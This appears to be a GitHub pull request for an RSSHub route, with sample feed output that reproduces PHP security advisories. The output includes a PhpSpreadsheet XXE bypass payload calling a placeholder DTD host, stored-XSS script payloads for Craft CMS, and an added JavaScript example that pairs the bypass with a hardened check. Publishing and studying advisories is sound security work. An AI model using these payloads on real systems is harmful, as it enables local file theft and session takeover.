feat(github): Add GitHub Advisory Database RSS route #16745
Successfully generated as follows: http://localhost:1200/github-advisor/data - Success ✔️
<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - composer</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github-advisor/data" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - composer - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Fri, 13 Sep 2024 16:19:16 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>[phpoffice/phpspreadsheet] XXE in PHPSpreadsheet encoding is returned</title>
<description><h3 id="summary">Summary</h3>
<p>Bypassing the filter allows an XXE attack, which in turn allows an attacker to obtain the contents of local files, even if error reporting is muted by the @ symbol (LFI attack).</p>
<h3 id="details">Details</h3>
<p>The check <code>$pattern = '/encoding="(.*?)"/';</code> is easy to bypass: just use a single quote symbol <code>'</code> around the encoding value. So the payload looks like this:</p>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<p>If you add this header to any XML file inside an xlsx-formatted file, such as <code>sharedStrings.xml</code>, then the XXE will execute.</p>
<h3 id="poc">PoC</h3>
<ol>
<li>Create a simple xlsx file.</li>
<li>Rename the xlsx to zip.</li>
<li>Go into the zip and open the <code>xl/sharedStrings.xml</code> file in edit mode.</li>
<li>Replace <code>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;</code> with</li>
</ol>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<ol start="5">
<li>Save the <code>sharedStrings.xml</code> file and rename the zip back to xlsx.</li>
<li>Use minimal PHP code that simply opens this xlsx file:</li>
</ol>
<pre><code>&lt;?php
// Loading the crafted workbook is enough: the reader parses sharedStrings.xml
// and the external entity is resolved.
use PhpOffice\PhpSpreadsheet\IOFactory;

require __DIR__ . '/vendor/autoload.php';

$spreadsheet = IOFactory::load('file.xlsx');
</code></pre>
<ol start="7">
<li>You will receive a request to your <code>http://%webhook%/file.dtd</code>.</li>
<li>Don't forget that you can use PHP wrappers in the XXE; some <code>php://</code> wrapper payloads allow fetching local files.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Read local files
<img alt="lfi" src="https://github.com/PHPOffice/PhpSpreadsheet/assets/95242087/1839cddb-6bb0-486d-8884-9ac485776931" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45048">https://nvd.nist.gov/vuln/detail/CVE-2024-45048</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda">https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-ghg6-32f9-2jp7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</guid>
<author>GitHub</author>
</item>
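The encoding check the advisory above describes, as an added example that is not PhpSpreadsheet's code: the PHP pattern <code>'/encoding="(.*?)"/'</code> ported to JavaScript next to a hardened replacement, both run over constructed stand-ins for <code>xl/sharedStrings.xml</code>. Only the regex and the payload shape come from the advisory; the function names, the sample documents and the hardened rules are assumptions made for illustration.

```javascript
// Added example (not PhpSpreadsheet's code): the advisory's encoding check,
// ported from PHP to JavaScript, beside a hardened replacement. Only the
// pattern '/encoding="(.*?)"/' and the payload shape come from the advisory;
// function names, sample documents and the hardened rules are illustrative.

// Vulnerable check: the pattern only recognises a double-quoted encoding
// attribute. encoding='UTF-7' (single quotes) is never matched, so the
// UTF-7-encoded DOCTYPE that follows reaches the XML parser untouched.
function vulnerableDeclaredEncoding(xml) {
  const m = /encoding="(.*?)"/.exec(xml);
  return m ? m[1] : null;
}

// Hardened check:
//  1. look only at the XML declaration at the start of the document and accept
//     either quote style around the encoding value (what the PHP regex missed);
//  2. refuse any declared encoding other than UTF-8, because a textual scan
//     for "<!DOCTYPE" / "<!ENTITY" is only meaningful in that encoding;
//  3. refuse a DOCTYPE outright, since that is where entity declarations live
//     and a spreadsheet part never needs one.
function hardenedCheck(xml) {
  const decl = /^\s*<\?xml[\s\S]*?\?>/.exec(xml);
  if (decl) {
    const enc = /\bencoding\s*=\s*(["'])([^"']*)\1/i.exec(decl[0]);
    if (enc && enc[2].toUpperCase() !== 'UTF-8') {
      return { ok: false, reason: `unsupported declared encoding: ${enc[2]}` };
    }
  }
  if (/<!DOCTYPE/i.test(xml)) {
    return { ok: false, reason: 'DOCTYPE not allowed' };
  }
  return { ok: true, reason: 'accepted' };
}

// Constructed sample documents standing in for xl/sharedStrings.xml.
const BENIGN =
  '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n<sst/>';
// The advisory's bypass: single-quoted UTF-7 declaration, DOCTYPE spelled in
// UTF-7 (+ADw- decodes to "<"), pointing at an attacker-controlled DTD.
const BYPASS =
  '<?xml version="1.0" encoding=\'UTF-7\' standalone="yes"?>\n' +
  '+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"> %xxe;]>';
// A plain UTF-8 document carrying an external entity, caught by rule 3.
const DOCTYPE_UTF8 =
  '<?xml version="1.0" encoding="UTF-8"?>\n' +
  '<!DOCTYPE x [<!ENTITY e SYSTEM "file:///etc/hostname">]>\n<x>&e;</x>';

function demo() {
  return {
    vulnerableSeesBypass: vulnerableDeclaredEncoding(BYPASS), // null: bypass undetected
    hardenedOnBypass: hardenedCheck(BYPASS).reason,
    hardenedOnBenign: hardenedCheck(BENIGN).reason,
    hardenedOnDoctype: hardenedCheck(DOCTYPE_UTF8).reason,
  };
}

console.log(demo());
```

The point of rule 2 is that any string-level filter for <code>&lt;!DOCTYPE</code> is only as good as the encoding the parser will actually use; once a document can declare UTF-7, the bytes the filter sees and the characters the parser sees are different things, so the encoding itself has to be pinned before any textual check is trusted. Disabling external entity resolution in the parser (e.g. <code>libxml_disable_entity_loader</code> style settings or a parser option that forbids DTDs) remains the primary defence; the declaration check above is a defence in depth.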
<item>
<title>[twig/twig] Twig has a possible sandbox bypass</title>
<description><h3 id="description">Description</h3>
<p>Under some circumstances, the sandbox security checks are not run, which allows user-contributed templates to bypass the sandbox restrictions.</p>
<p>The security issue happens when all these conditions are met:</p>
<ul>
<li>The sandbox is disabled globally;</li>
<li>The sandbox is enabled via a sandboxed <code>include()</code> function which references a template name (like <code>included.twig</code>) and not a <code>Template</code> or <code>TemplateWrapper</code> instance;</li>
<li>The included template has been loaded before the <code>include()</code> call but in a non-sandbox context (possible as the sandbox has been globally disabled).</li>
</ul>
<h3 id="resolution">Resolution</h3>
<p>The patch ensures that the sandbox security checks are always run at runtime.</p>
<h3 id="credits">Credits</h3>
<p>We would like to thank Fabien Potencier for reporting and fixing the issue.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66">https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6">https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de">https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233">https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45411">https://nvd.nist.gov/vuln/detail/CVE-2024-45411</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635">https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635</a></li>
<li><a href="https://github.com/advisories/GHSA-6j75-5wfj-gh66">https://github.com/advisories/GHSA-6j75-5wfj-gh66</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6j75-5wfj-gh66</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6j75-5wfj-gh66</guid>
<author>GitHub</author>
</item>
<item>
<title>[damienharper/auditor-bundle] auditor-bundle vulnerable to Cross-site Scripting because name of entity does not get escaped</title>
<description><h3 id="summary">Summary</h3>
<p>An unescaped entity property enables JavaScript injection.</p>
<h3 id="details">Details</h3>
<p>I think this is possible because %source_label% in the Twig macro is not escaped. Therefore script tags can be inserted and are executed.</p>
<h3 id="poc">PoC</h3>
<ul>
<li>Clone the example project <a href="https://github.com/DamienHarper/auditor-bundle-demo">https://github.com/DamienHarper/auditor-bundle-demo</a></li>
<li>Create an author with FullName </li>
<li>Delete the author</li>
<li>View the audit of authors</li>
<li>An alert is displayed</li>
</ul>
<h3 id="impact">Impact</h3>
<p>Persistent XSS: JS can be injected and executed.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/DamienHarper/auditor-bundle/security/advisories/GHSA-78vg-7v27-hj67">https://github.com/DamienHarper/auditor-bundle/security/advisories/GHSA-78vg-7v27-hj67</a></li>
<li><a href="https://github.com/DamienHarper/auditor-bundle/commit/42ba2940d8b99467de0c806ea5655cc1c6882cd1">https://github.com/DamienHarper/auditor-bundle/commit/42ba2940d8b99467de0c806ea5655cc1c6882cd1</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45592">https://nvd.nist.gov/vuln/detail/CVE-2024-45592</a></li>
<li><a href="https://github.com/advisories/GHSA-78vg-7v27-hj67">https://github.com/advisories/GHSA-78vg-7v27-hj67</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-78vg-7v27-hj67</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-78vg-7v27-hj67</guid>
<author>GitHub</author>
</item>
<item>
<title>[topthink/framework] ThinkPHP deserialization vulnerability</title>
<description><p>A deserialization vulnerability in ThinkPHP v6.1.3 to v8.0.4 allows attackers to execute arbitrary code.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-44902">https://nvd.nist.gov/vuln/detail/CVE-2024-44902</a></li>
<li><a href="https://github.com/fru1ts/CVE-2024-44902">https://github.com/fru1ts/CVE-2024-44902</a></li>
<li><a href="http://thinkphp.com/">http://thinkphp.com</a></li>
<li><a href="https://github.com/advisories/GHSA-f4wh-359g-4pq7">https://github.com/advisories/GHSA-f4wh-359g-4pq7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-f4wh-359g-4pq7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-f4wh-359g-4pq7</guid>
<author>GitHub</author>
</item>
<item>
<title>[craftcms/cms] Craft CMS vulnerable to stored XSS in breadcrumb list and title fields</title>
<description><h3 id="summary">Summary</h3>
<p>Multiple Stored XSS can be triggered by the breadcrumb list and title fields with user input.</p>
<h3 id="details">Details</h3>
<ol>
<li>In the <strong>/admin/categories</strong> page, the category title isn't sanitized and triggers XSS.</li>
<li>In the category edit page under <strong>/admin/categories/</strong>, the category title in the breadcrumb list isn't sanitized and triggers XSS.</li>
<li>In the <strong>/admin/entries</strong> page, the entry title isn't sanitized and triggers XSS.</li>
<li>In the entry edit page under <strong>/admin/entries/</strong>, the entry title in the breadcrumb list isn't sanitized and triggers XSS.</li>
<li>In <strong>/admin/myaccount</strong> and the pages under it, the username or full name in the breadcrumb list isn't sanitized and triggers XSS.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Malicious users can tamper with the control panel.</p>
<h3 id="poc">PoC</h3>
<h4 id="1-in-the-admincategories-page-category-title-isnt-sanitized-and-triggered-xss">1. In the <strong>/admin/categories</strong> page, the category title isn't sanitized and triggers XSS.</h4>
<pre><code>1. Go to Settings -&gt; Categories ( /admin/settings/categories )
2. Create a new category group
3. Go to the Categories page ( /admin/categories/ )
4. Click the New category button
5. Enter in the Title field: xss&lt;script&gt;alert('xss')&lt;/script&gt;
6. Click the Create Category or Save button
7. Open the Categories page again; the XSS triggers
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/a1b2890e-731b-4fc4-b189-26591f4486fd" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/4e0f35c7-fbb0-4d38-a0b5-9e28750ff706" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/e046b9db-d83c-4f81-ad91-165c5afedeb9" referrerpolicy="no-referrer"></p>
<h4 id="2-in-the-category-edit-page-under-the-admincategories-category-title-in-breadcrumb-list-isnt-sanitized-and-triggered-xss">2. In the category edit page under <strong>/admin/categories/</strong>, the category title in the breadcrumb list isn't sanitized and triggers XSS.</h4>
<pre><code>1. Go to Settings -&gt; Categories ( /admin/settings/categories )
2. Create a new category group
3. Go to the Categories page ( /admin/categories/ )
4. Click the New category button
5. Enter in the Title field: xss&lt;script&gt;alert('xss')&lt;/script&gt;
6. Click the Create Category or Save button
7. Open the category edit page again; the XSS triggers
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/a1b2890e-731b-4fc4-b189-26591f4486fd" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/f7543a11-58eb-4099-9ee2-3461816c52ea" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/f01bbb80-4417-42ca-bf51-b38860f6c74a" referrerpolicy="no-referrer"></p>
<h4 id="3-in-the-adminentries-page-entry-title-isnt-sanitized-and-triggered-xss">3. In the <strong>/admin/entries</strong> page, the entry title isn't sanitized and triggers XSS.</h4>
<pre><code>1. Go to Settings -&gt; Entry Types ( /admin/settings/entry-types )
2. Create a new entry type
3. Go to Settings -&gt; Sections ( /admin/settings/sections )
4. Create a new section
5. Go to the Entries page ( /admin/entries )
6. Click the New entry button
7. Enter in the Title field: xss&lt;script&gt;alert('xss')&lt;/script&gt;
8. Click the Create entry or Save button
9. Open the Entries page again; the XSS triggers
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/ba700899-947f-4421-a1b7-3f0cc2c0da30" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/b255a999-e48c-46be-b732-4482ea9cee9a" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/445d8e0c-71b6-49c7-8f4a-37541dcc9c85" referrerpolicy="no-referrer"></p>
<h4 id="4-in-the-entry-edit-page-under-the-adminentries-entry-title-in-breadcrumb-list-isnt-sanitized-and-triggered-xss">4. In the entry edit page under <strong>/admin/entries/</strong>, the entry title in the breadcrumb list isn't sanitized and triggers XSS.</h4>
<pre><code>1. Go to Settings -&gt; Entry Types ( /admin/settings/entry-types )
2. Create a new entry type
3. Go to Settings -&gt; Sections ( /admin/settings/sections )
4. Create a new section
5. Go to the Entries page ( /admin/entries )
6. Click the New entry button
7. Enter in the Title field: xss&lt;script&gt;alert('xss')&lt;/script&gt;
8. Click the Create entry or Save button
9. Open the entry edit page again; the XSS triggers
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/ba700899-947f-4421-a1b7-3f0cc2c0da30" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/a59a122b-b9e7-4695-be13-eb8a1c2d36df" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/b0d27446-7ac6-47e7-ac02-20c924698b13" referrerpolicy="no-referrer"></p>
<h4 id="5-in-the-adminmyaccount-and-pages-under-it-username-or-full-name-in-breadcrumb-list-isnt-sanitized-and-triggered-xss">5. In <strong>/admin/myaccount</strong> and the pages under it, the username or full name in the breadcrumb list isn't sanitized and triggers XSS.</h4>
<pre><code>1. Go to the My Account page ( /admin/myaccount )
2. Enter in the Full Name field: xss&lt;script&gt;alert('xss')&lt;/script&gt;
3. Click the Save button
4. Open the My Account page ( /admin/myaccount ) or a page under it ( /admin/myaccount/addresses , /admin/myaccount/preferences , etc.); the XSS triggers
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/3be45bdd-0757-42a8-bc5d-320ab2339fd0" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/e1be7446-1c54-42bc-af9a-a8ac81a2d7bf" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/5fa06b26-fecd-40f5-bc8b-171f881f8a2a" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/craftcms/cms/security/advisories/GHSA-28h4-788g-rh42">https://github.com/craftcms/cms/security/advisories/GHSA-28h4-788g-rh42</a></li>
<li><a href="https://github.com/craftcms/cms/commit/b7348942f8131b3868ec6f46d615baae50151bb8">https://github.com/craftcms/cms/commit/b7348942f8131b3868ec6f46d615baae50151bb8</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45406">https://nvd.nist.gov/vuln/detail/CVE-2024-45406</a></li>
<li><a href="https://github.com/advisories/GHSA-28h4-788g-rh42">https://github.com/advisories/GHSA-28h4-788g-rh42</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-28h4-788g-rh42</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-28h4-788g-rh42</guid>
<author>GitHub</author>
</item>
<item>
<title>[nategood/httpful] Httpful is Missing Certificate Validation</title>
<description><p>Httpful makes insecure HTTPS connections because certificate validation is not enabled by default.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/nategood/httpful/issues/247">https://github.com/nategood/httpful/issues/247</a></li>
<li><a href="https://github.com/nategood/httpful/commit/44c880e4f559e9215dc6ea9fe50315500c6c2c84">https://github.com/nategood/httpful/commit/44c880e4f559e9215dc6ea9fe50315500c6c2c84</a></li>
<li><a href="https://github.com/FriendsOfPHP/security-advisories/blob/master/nategood/httpful/2024-05-01.yaml">https://github.com/FriendsOfPHP/security-advisories/blob/master/nategood/httpful/2024-05-01.yaml</a></li>
<li><a href="https://github.com/nategood/httpful/blob/fc8e4274a09529a6ff29b9c6c0a105ee43dbfda5/src/Httpful/Request.php#L35">https://github.com/nategood/httpful/blob/fc8e4274a09529a6ff29b9c6c0a105ee43dbfda5/src/Httpful/Request.php#L35</a></li>
<li><a href="https://huntr.com/bounties/8d59c089-92f1-4b73-90f8-54968a70e2fb">https://huntr.com/bounties/8d59c089-92f1-4b73-90f8-54968a70e2fb</a></li>
<li><a href="https://github.com/advisories/GHSA-gcfg-hmwx-wq5h">https://github.com/advisories/GHSA-gcfg-hmwx-wq5h</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-gcfg-hmwx-wq5h</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-gcfg-hmwx-wq5h</guid>
<author>GitHub</author>
</item>
<item>
<title>[twbs/bootstrap] Bootstrap Cross-Site Scripting (XSS) vulnerability</title>
<description><p>A vulnerability has been identified in Bootstrap that exposes users to Cross-Site Scripting (XSS) attacks. The issue is present in the carousel component, where the data-slide and data-slide-to attributes can be exploited through the href attribute of an &lt;a&gt; tag due to inadequate sanitization. This vulnerability could potentially enable attackers to execute arbitrary JavaScript within the victim's browser.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-6531">https://nvd.nist.gov/vuln/detail/CVE-2024-6531</a></li>
<li><a href="https://www.herodevs.com/vulnerability-directory/cve-2024-6531">https://www.herodevs.com/vulnerability-directory/cve-2024-6531</a></li>
<li><a href="https://github.com/rubysec/ruby-advisory-db/blob/master/gems/bootstrap/CVE-2024-6531.yml">https://github.com/rubysec/ruby-advisory-db/blob/master/gems/bootstrap/CVE-2024-6531.yml</a></li>
<li><a href="https://github.com/advisories/GHSA-vc8w-jr9v-vj7f">https://github.com/advisories/GHSA-vc8w-jr9v-vj7f</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-vc8w-jr9v-vj7f</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-vc8w-jr9v-vj7f</guid>
<author>GitHub</author>
</item>
<item>
<title>[reportico-web/reportico] SQL Injection vulnerability in Reportico Till</title>
<description><p>A SQL injection vulnerability in Reportico up to and including 8.1.0 allows attackers to obtain sensitive information or other system information via the project parameter.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-47438">https://nvd.nist.gov/vuln/detail/CVE-2023-47438</a></li>
<li><a href="https://github.com/reportico-web/reportico/issues/52">https://github.com/reportico-web/reportico/issues/52</a></li>
<li><a href="https://github.com/advisories/GHSA-jjf4-959w-f545">https://github.com/advisories/GHSA-jjf4-959w-f545</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-jjf4-959w-f545</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-jjf4-959w-f545</guid>
<author>GitHub</author>
</item>
<item>
<title>[phpoffice/phpspreadsheet] PhpSpreadsheet HTML writer is vulnerable to Cross-Site Scripting via style information</title>
<description><h3 id="summary">Summary</h3>
<p><code>\PhpOffice\PhpSpreadsheet\Writer\Html</code> doesn't sanitize spreadsheet styling information such as font names, allowing an attacker to inject arbitrary JavaScript on the page.</p>
<h3 id="poc">PoC</h3>
<p>Example target script:</p>
<pre><code>&lt;?php
require 'vendor/autoload.php';

// Load the crafted workbook and render it with the HTML writer; the
// unsanitized style information (e.g. a font name) ends up in the markup.
$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader("Xlsx");
$spreadsheet = $reader-&gt;load(__DIR__ . '/book.xlsx');
$writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet);
print($writer-&gt;generateHTMLAll());
</code></pre>
<p>Save this file in the same directory:
<a href="https://github.com/PHPOffice/PhpSpreadsheet/files/15212797/book.xlsx">book.xlsx</a></p>
<p>Save the script as index.php and open it in a web browser. An alert should be displayed.</p>
<h3 id="impact">Impact</h3>
<p>Full takeover of the session of users viewing spreadsheet files as HTML.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wgmf-q9vr-vww6">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wgmf-q9vr-vww6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45046">https://nvd.nist.gov/vuln/detail/CVE-2024-45046</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/pull/3957">https://github.com/PHPOffice/PhpSpreadsheet/pull/3957</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/f7cf378faed2e11cf4825bf8bafea4922ae44667">https://github.com/PHPOffice/PhpSpreadsheet/commit/f7cf378faed2e11cf4825bf8bafea4922ae44667</a></li>
<li><a href="https://github.com/advisories/GHSA-wgmf-q9vr-vww6">https://github.com/advisories/GHSA-wgmf-q9vr-vww6</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-wgmf-q9vr-vww6</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-wgmf-q9vr-vww6</guid>
<author>GitHub</author>
</item>
<item>
<title>[phpoffice/phpspreadsheet] XXE in PHPSpreadsheet encoding is returned</title>
<description><h3 id="summary">Summary</h3>
<p>Bypassing the filter allows an XXE attack, which in turn allows an attacker to obtain the contents of local files, even if error reporting is muted by the @ symbol (LFI attack).</p>
<h3 id="details">Details</h3>
<p>The check <code> $pattern = '/encoding="(.*?)"/';</code> is easy to bypass: just use a single quote symbol <code>'</code>. So the payload looks like this:</p>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<p>If you add this header to any XML file inside an xlsx-formatted file, such as the sharedStrings.xml file, then the XXE will execute.</p>
<h3 id="poc">PoC</h3>
<ol>
<li>Create a simple xlsx file.</li>
<li>Rename the xlsx to zip.</li>
<li>Go into the zip and open the <code>xl/sharedStrings.xml</code> file in edit mode.</li>
<li>Replace <code>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;</code> with</li>
</ol>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<ol start="5">
<li>Save <code>sharedStrings.xml</code> file and rename zip back to xlsx.</li>
<li>Use minimal php code that simply opens this xlsx file:</li>
</ol>
<pre><code>use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");
</code></pre>
<ol start="7">
<li>You will receive a request to your <code>http://%webhook%/file.dtd</code>.</li>
<li>Don't forget that you can use PHP wrappers in XXE; some php:// wrapper payloads allow fetching local files.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Read local files
<img alt="lfi" src="https://github.com/PHPOffice/PhpSpreadsheet/assets/95242087/1839cddb-6bb0-486d-8884-9ac485776931" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45048">https://nvd.nist.gov/vuln/detail/CVE-2024-45048</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda">https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-ghg6-32f9-2jp7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/pimcore] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/admin-ui-classic-bundle] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
</channel>
</rss> ... |
http://localhost:1200/github-advisor/data/composer - Success ✔️
<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
